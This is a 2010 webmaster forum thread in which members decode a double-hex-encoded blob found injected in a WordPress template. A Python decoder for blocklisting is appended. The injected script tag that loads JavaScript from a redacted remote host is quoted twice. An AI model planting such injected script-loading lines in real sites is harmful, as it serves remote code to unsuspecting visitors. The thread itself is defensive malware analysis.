decipher a chunk of malware

2:26 pm on Jul 6, 2010 (gmt 0)

Senior Member from CA 

WebmasterWorld Senior Member httpwebwitch is a WebmasterWorld Top Contributor of All Time 10+ Year Member

joined:Aug 29, 2003
votes: 0

Here's a challenge for someone who likes puzzles

I just found this little chunk of crap injected into my WordPress template.

<script language="javascript" src="http://get.----[domain removed]----.com/inurl.js"></script>304430413343373336333732363937303734323036433631364536373735363136373635334432323641363137363631373336333732363937303734323232303733373236333344323236383734373437303341324632463637363537343245373336353734363836353646324536333646364432463639364537353732364332453641373332323345334332463733363337323639373037343345

do the numbers mean anything?

4:54 pm on July 6, 2010 (gmt 0)

Preferred Member

10+ Year Member

joined:July 25, 2006
posts: 460
votes: 0

An initial guess would be that each 2 digit pair is the hex code for an ASCII char. By that method, the first 8 digits decode to 0D0A, which is a carriage return + line feed.

Another guess is that the string is decoded or transformed by the inurl.js file fetched from the remote site.

5:12 pm on July 6, 2010 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Jan 29, 2002
votes: 0

It's double hex encoded, and appears to decode to the <script> statement you quote above:

<script language="javascript" src="http://get.----[mattur removed]----.com/inurl.js"></script>

Malfunctioning malware?! :)
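
The layered decoding described in the replies above, as an added example that is not part of the original thread: it peels hex layers until the data stops looking like hex pairs, then lists any external script URLs for blocklisting or log searches. The function names, the `max_layers` bound and the `example.invalid` sample are assumptions made for illustration; the sample is constructed and is not the blob from the post.

```python
import re

HEX_RE = re.compile(rb"\A(?:[0-9A-Fa-f]{2})+\Z")
SRC_RE = re.compile(rb"""<script[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)


def peel_hex(blob, max_layers=5):
    """Hex-decode repeatedly while the data is still pure hex pairs.

    Returns (decoded_bytes, layers_removed). max_layers bounds the loop so a
    payload whose plain text merely looks like hex is not decoded forever.
    """
    data = blob.strip()
    if isinstance(data, str):
        data = data.encode("ascii", "ignore")
    layers = 0
    while layers < max_layers and HEX_RE.match(data):
        data = bytes.fromhex(data.decode("ascii"))
        layers += 1
    return data, layers


def script_sources(decoded):
    """List external script URLs referenced in the decoded markup."""
    return [m.decode("ascii", "replace") for m in SRC_RE.findall(decoded)]


def make_sample():
    # Constructed sample: CRLF plus a script tag pointing at a placeholder
    # host, hex-encoded twice in upper case like the string in the thread.
    tag = (b'\r\n<script language="javascript" '
           b'src="http://example.invalid/inurl.js"></script>')
    return tag.hex().upper().encode().hex().upper()


if __name__ == "__main__":
    decoded, layers = peel_hex(make_sample())
    print("layers removed:", layers)
    print("decoded:", repr(decoded))
    print("script sources:", script_sources(decoded))
```
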
